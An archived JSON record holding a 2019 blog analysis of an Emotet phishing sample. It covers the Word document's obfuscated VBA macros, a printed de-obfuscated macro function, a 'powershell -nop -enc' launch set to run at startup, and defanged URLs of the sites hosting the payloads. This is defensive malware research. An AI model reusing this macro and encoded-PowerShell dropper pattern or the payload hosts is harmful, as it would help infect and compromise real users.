{
	"id": "30ccaa82-c863-45d6-9ee9-6178c6c75a0a",
	"created_at": "2026-04-06T00:10:28.995981Z",
	"updated_at": "2026-04-10T13:12:08.087118Z",
	"deleted_at": null,
	"sha1_hash": "71035736af68098e95c5085ae6f11bbc28c06816",
	"title": "Emotet malware analysis. Part 1.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 318506,
	"plain_text": "Emotet malware analysis. Part 1.\r\nPublished: 2019-03-17 · Archived: 2026-04-02 10:59:46 UTC\r\nThis is Part 1 of the Emotet malware analysis I’m planning to post. It covers phases 1 and 2 of the attack, specifically phishing and establishing persistence in the infected system. Emotet is spread via phishing emails containing malicious links or attachments, and targets everyone (individuals, companies and governments).\r\nPhase 1. Malicious email and document.\r\nThe first phase of the attack starts with a phishing email. The subject, layout, attachments and links are modified periodically by the attackers. In this article I’m going to analyze this sample from VirusTotal.\r\nOne of Emotet’s characteristics is the constantly changing content of its phishing emails. Usually these contain a malicious link or attachment. This article covers a sample that was spread via a set of such links; every one of them, once accessed, dropped a Microsoft Office document with macros in it.\r\nhttps://persianov.net/emotet-malware-analysis-part-1\r\nPage 1 of 4\n\nChecksum File type File Size\r\nf5e9c63713c7ff968f4958a9b5161e78af05f21493e56555734b89f55b2be24c MS Word Document 246KB (251904 bytes)\r\nAnalysis.\r\nBased on the output of the file command for this sample, the document has 1 page and doesn’t contain any words.\r\nf5e9c63713c7ff968f4958a9b5161e78af05f21493e56555734b89f55b2be24c: Composite Document File V2 Document, Little Endian,\r\nOs: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Micros\r\nCreate Time/Date: Mon Mar 11 21:32:00 2019, Last Saved Time/Date: Mon Mar 11 21:32:00 2019, Number of Pages: 1,\r\nNumber of Words: 0, Number of Characters: 5, Security: 0\r\nListing the document’s objects with oletools, 3 macro elements (marked M) were found:\r\n 7: 74 'Macros/PROJECTwm'\r\n 8: M 70540 'Macros/VBA/S1ADDQ1A'\r\n 9: M 14650 'Macros/VBA/YBB1wA'\r\n 10: 49987 'Macros/VBA/_VBA_PROJECT'\r\n 11: 1344 'Macros/VBA/__SRP_0'\r\n 12: 110 'Macros/VBA/__SRP_1'\r\n 13: 436 'Macros/VBA/__SRP_2'\r\n 14: 187 'Macros/VBA/__SRP_3'\r\n 15: 601 'Macros/VBA/dir'\r\n 16: M 9719 'Macros/VBA/mA4QAX4'\r\n 17: 4096 'WordDocument'\r\nObjects 8, 9 and 16 contain Visual Basic code and are thus of higher interest for further analysis.\r\nObject Name Checksum Size\r\n8 S1ADDQ1A 34ffc69ff37401b965b04fa4f3c1fbcdffab11fd2e34f9e17a8347b70922398b 44KB (44096 bytes)\r\n9 YBB1wA d51c137e3f591a275628e697d2fbb305cc3c630455480508184b45753608d973 8.8KB (8956 bytes)\r\n16 mA4QAX4 d2e56d56ced7ed8de5f701a873086c8134e1311dd574a607a45023f38d5ecaf7 5.6KB (5671 bytes)\r\nOut of all extracted parts of the script, mA4QAX4 is the entry point and starts the execution once the document is opened.\r\nThe whole VBA code is obfuscated, as seen in the image below.\r\nAll three parts depend on each other and have to be merged for further analysis. You can find the merged code HERE.\r\nThe call chain looks like this:\r\n1. autoopen();\r\n2. iQwUcAAU(param):\r\nCreates the Win32_ProcessStartup class;\r\nCreates an object of the class by calling the Create method;\r\nPasses the param string as the command argument, thus starting the execution;\r\nThe value of param consists of the concatenated results of the following functions: SQoBUAA, vDXBUQ, rDCAQQcA, pAADAADD, k1kGUAB, cAABQDw. All these functions are similar in terms of logic and were easy to de-obfuscate. Below is the clean version of SQoBUAA:\r\nFunction SQoBUAA()\r\nOn Error Resume Next\r\njkQBUx = \"l -\" + \"nop\" + \" -e\" + \"n\" + \"c\" + \" JA\" + \"BHA\" + \"G\" + \"8Aa\" + \"wB\" + \"HA\" + \"E\" + \"M\" + \"AN\" + \"A\" + \"B\" + \"B\r\nlBADQoU = \"cAe\" + \"gBf\" + \"AC\" + \"cAK\" + \"w\" + \"An\" + \"AEE\" + \"AWg\" + \"AnA\" + \"CsA\" + \"Jw\" + \"Br\" + \"A\" + \"G8A\" + \"RAB\"\r\ntcoAAAAQ = \"B\" + \"ACc\" + \"A\" + \"K\" + \"Q\" + \"A7A\" + \"CQ\" + \"AU\" + \"gBf\" + \"AEE\" + \"A\" + \"a\" + \"w\" + \"AxA\" + \"F8\"\r\nHAQUxA_ = \"AQQ\" + \"BBA\" + \"D0\" + \"Abg\" + \"BlA\" + \"Hc\" + \"ALQ\" + \"BvA\" + \"GI\" + \"Aa\" + \"gBl\" + \"AG\" + \"MAd\" + \"A\" + \"AgA\" +\r\ntUQokAA = \"IA\" + \"Qw\" + \"Bs\" + \"AGk\" + \"AZQ\" + \"Bu\" + \"AH\" + \"Q\" + \"A\" + \"O\" + \"wA\" + \"kAG\" + \"k\" + \"AVQ\" + \"Bv\" + \"AF\" +\r\ncUAAoX = \"d\" + \"AAn\" + \"ACs\" + \"AJw\" + \"B0\" + \"AH\" + \"A\" + \"AOg\" + \"A\" + \"vA\" + \"C8A\" + \"Yg\" + \"B\" + \"pA\" + \"G\" + \"U\" + \"A\r\nAkQG_A = \"A\" + \"Cc\" + \"AKw\" + \"An\" + \"AG\" + \"4AL\" + \"g\" + \"B\" + \"uAG\" + \"UAd\" + \"AA\" + \"vAG\" + \"wA\" + \"ZQB\" + \"zAG\" + \"wA\"\r\nSQoBUAA = jkQBUx + lBADQoU + tcoAAAAQ + HAQUxA_ + tUQokAA + cUAAoX + AkQG_A\r\nEnd Function\r\nPhase 2. Persistent Powershell.\r\nThe document macros extract a base64-encoded PowerShell script, launched as powershell -nop -enc <base64 payload>, and set it to run at system startup.\r\nOnce decoded, several URLs pop up which drop the phase 3 PE files.\r\nIn total there are 5 different websites hosting the Emotet malware.\r\nURL Dropped PE Checksum\r\nhxxp://biederman.net/leslie/lL/ e76900b9b50306564c415423e0eb28463722b0427186134ba301209b4ed2f440\r\nhxxp://nissanbacgiang.com/wp-content/xR3/ 5c2fbc0eaae6ccc8342c22325f0aca1e989beec8d578e3fe57722b807a46c773\r\nhxxp://equidaddegenero.iztacala.unam.mx/wp-admin/XPF/ bc0d53d74f3f4ef286b4f4caeb8d8b77e32cc17b808dd0de5674842ad713dd72\r\nhxxp://stylishlab.webpixabyte.com/thjowrk5e/9UG/ 1c06da405051cfc9f68dbb404e338abb90a38db29f86f17e01487ac2c921c05d\r\nhxxp://www.zestevents.co/wp-includes/GJAo/ 403 HTTP Error\r\nConclusion.\r\nIt looks like the group behind Emotet hasn’t focused on heavily obfuscating the phase 1 and 2 scripts. Analysis of the downloaded samples will follow in Part 2 of this article.\r\nSource: https://persianov.net/emotet-malware-analysis-part-1",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://persianov.net/emotet-malware-analysis-part-1"
	],
	"report_names": [
		"emotet-malware-analysis-part-1"
	],
	"threat_actors": [],
	"ts_created_at": 1775434228,
	"ts_updated_at": 1775826728,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/71035736af68098e95c5085ae6f11bbc28c06816.pdf",
		"text": "https://archive.orkl.eu/71035736af68098e95c5085ae6f11bbc28c06816.txt",
		"img": "https://archive.orkl.eu/71035736af68098e95c5085ae6f11bbc28c06816.jpg"
	}
}